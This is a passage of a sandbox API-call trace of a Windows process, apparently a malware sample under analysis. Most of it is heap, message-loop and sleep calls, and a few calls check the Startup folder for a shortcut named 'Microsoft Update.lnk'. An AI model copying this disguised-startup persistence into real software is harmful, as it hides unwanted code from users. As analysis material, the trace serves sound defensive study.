hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0241.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0241.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0241.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0241.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0241.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0241.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0241.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0241.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0241.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0241.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0241.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0241.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0241.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0241.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0241.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0241.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0241.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0241.539] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0241.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0241.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0241.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0241.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0241.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0241.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0241.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0241.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0241.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0241.540] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0241.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0241.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0241.540] CharUpperBuffW (in: lpsz="StartupDir", cchLength=0xa | out: lpsz="STARTUPDIR") returned 0xa [0241.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0241.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0241.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab458 [0241.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0241.540] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0241.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab6e0 [0241.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0241.540] SHGetFolderPathW (in: hwnd=0x0, csidl=7, hToken=0x0, dwFlags=0x0, pszPath=0x8cf298 | out: pszPath="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 0x0 [0241.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0241.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xa0) returned 0x2a683a8 [0241.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0241.540] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0241.540] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0241.540] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0241.540] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0241.541] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0241.541] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0241.541] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0241.541] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0241.541] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0241.541] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0241.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0241.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7220 [0241.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0241.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x190) returned 0x50e0048 [0241.541] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0241.541] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0241.541] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7220 | out: hHeap=0x2af0000) returned 1 [0241.541] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0241.541] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0241.541] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup/Microsoft Update.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\microsoft update.lnk")) returned 0x20 [0241.541] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x50e0048 | out: hHeap=0x2af0000) returned 1 [0241.541] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0241.541] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0241.541] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0241.541] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0241.541] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0241.542] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0241.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0241.542] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0241.542] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0241.542] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0241.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0241.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0241.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0241.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0241.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0241.542] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0241.542] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0241.542] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0241.542] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0241.542] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0241.542] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0241.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0241.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0241.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0241.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0241.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0241.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0241.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0241.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0241.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0241.543] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0241.543] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0241.543] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0241.543] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0241.543] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0241.543] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0241.543] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab488 [0241.543] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0241.543] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0241.543] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab500 [0241.543] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0241.543] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf298 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0241.543] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0241.543] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x50) returned 0x29eb058 [0241.543] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0241.543] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0241.543] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0241.543] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0241.543] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0241.543] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0241.543] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0241.543] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0241.543] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0241.543] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0241.543] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0241.544] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0241.544] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fe0 [0241.544] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0241.544] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xb0) returned 0x29f7878 [0241.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eb058 | out: hHeap=0x2af0000) returned 1 [0241.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0241.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fe0 | out: hHeap=0x2af0000) returned 1 [0241.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0241.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0241.544] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp/8x8x8" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\8x8x8")) returned 0x20 [0241.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0241.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0241.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0241.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0241.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0241.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0241.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0241.544] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0241.544] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0241.544] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0241.544] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0241.544] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0241.544] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0241.544] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0241.545] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0241.545] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0241.545] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0241.545] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0241.545] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0241.545] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0241.545] timeGetTime () returned 0x117c4e3 [0241.545] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0241.545] Sleep (dwMilliseconds=0xa) [0241.581] timeGetTime () returned 0x117c512 [0241.581] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0241.581] Sleep (dwMilliseconds=0xa) [0241.628] timeGetTime () returned 0x117c541 [0241.628] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0241.628] Sleep (dwMilliseconds=0xa) [0241.661] timeGetTime () returned 0x117c560 [0241.661] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0241.661] Sleep (dwMilliseconds=0xa) [0241.706] timeGetTime () returned 0x117c58f [0241.706] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0241.706] Sleep (dwMilliseconds=0xa) [0241.722] timeGetTime () returned 0x117c59e [0241.722] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0241.722] Sleep (dwMilliseconds=0xa) [0241.740] timeGetTime () returned 0x117c5ae [0241.740] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0241.740] Sleep (dwMilliseconds=0xa) [0241.764] timeGetTime () returned 0x117c5be [0241.764] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0241.764] Sleep (dwMilliseconds=0xa) [0241.785] timeGetTime () returned 0x117c5de [0241.785] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0241.785] Sleep (dwMilliseconds=0xa) [0241.815] timeGetTime () returned 0x117c5fc [0241.815] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0241.816] Sleep (dwMilliseconds=0xa) [0241.836] timeGetTime () returned 0x117c60c [0241.836] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0241.836] Sleep (dwMilliseconds=0xa) [0241.862] timeGetTime () returned 0x117c62b [0241.862] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0241.862] Sleep (dwMilliseconds=0xa) [0241.878] timeGetTime () returned 0x117c63b [0241.878] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0241.878] Sleep (dwMilliseconds=0xa) [0241.893] timeGetTime () returned 0x117c64a [0241.893] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0241.894] Sleep (dwMilliseconds=0xa) [0241.912] timeGetTime () returned 0x117c65a [0241.912] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 1 [0241.912] TranslateMessage (lpMsg=0x8cf798) returned 0 [0241.912] DispatchMessageW (lpMsg=0x8cf798) returned 0x0 [0241.912] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0241.912] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0241.915] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0241.915] Sleep (dwMilliseconds=0xa) [0241.940] timeGetTime () returned 0x117c679 [0241.940] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0241.940] Sleep (dwMilliseconds=0xa) [0241.956] timeGetTime () returned 0x117c689 [0241.956] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0241.956] Sleep (dwMilliseconds=0xa) [0241.972] timeGetTime () returned 0x117c698 [0241.972] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0241.972] Sleep (dwMilliseconds=0xa) [0241.987] timeGetTime () returned 0x117c6a8 [0241.987] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0241.987] Sleep (dwMilliseconds=0xa) [0242.003] timeGetTime () returned 0x117c6b8 [0242.003] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0242.003] Sleep (dwMilliseconds=0xa) [0242.019] timeGetTime () returned 0x117c6c7 [0242.019] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0242.019] Sleep (dwMilliseconds=0xa) [0242.034] timeGetTime () returned 0x117c6d7 [0242.034] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0242.034] Sleep (dwMilliseconds=0xa) [0242.082] timeGetTime () returned 0x117c706 [0242.082] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0242.082] Sleep (dwMilliseconds=0xa) [0242.096] timeGetTime () returned 0x117c715 [0242.096] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0242.096] Sleep (dwMilliseconds=0xa) [0242.112] timeGetTime () returned 0x117c725 [0242.112] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0242.112] Sleep (dwMilliseconds=0xa) [0242.128] timeGetTime () returned 0x117c735 [0242.128] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0242.128] Sleep (dwMilliseconds=0xa) [0242.144] timeGetTime () returned 0x117c744 [0242.144] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0242.144] Sleep (dwMilliseconds=0xa) [0242.159] timeGetTime () returned 0x117c754 [0242.159] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0242.159] Sleep (dwMilliseconds=0xa) [0242.175] timeGetTime () returned 0x117c764 [0242.175] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0242.175] Sleep (dwMilliseconds=0xa) [0242.206] timeGetTime () returned 0x117c783 [0242.206] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0242.206] Sleep (dwMilliseconds=0xa) [0242.221] timeGetTime () returned 0x117c792 [0242.221] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0242.221] Sleep (dwMilliseconds=0xa) [0242.275] timeGetTime () returned 0x117c7c1 [0242.275] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0242.275] Sleep (dwMilliseconds=0xa) [0242.299] timeGetTime () returned 0x117c7e1 [0242.300] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0242.300] Sleep (dwMilliseconds=0xa) [0242.315] timeGetTime () returned 0x117c7f0 [0242.315] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 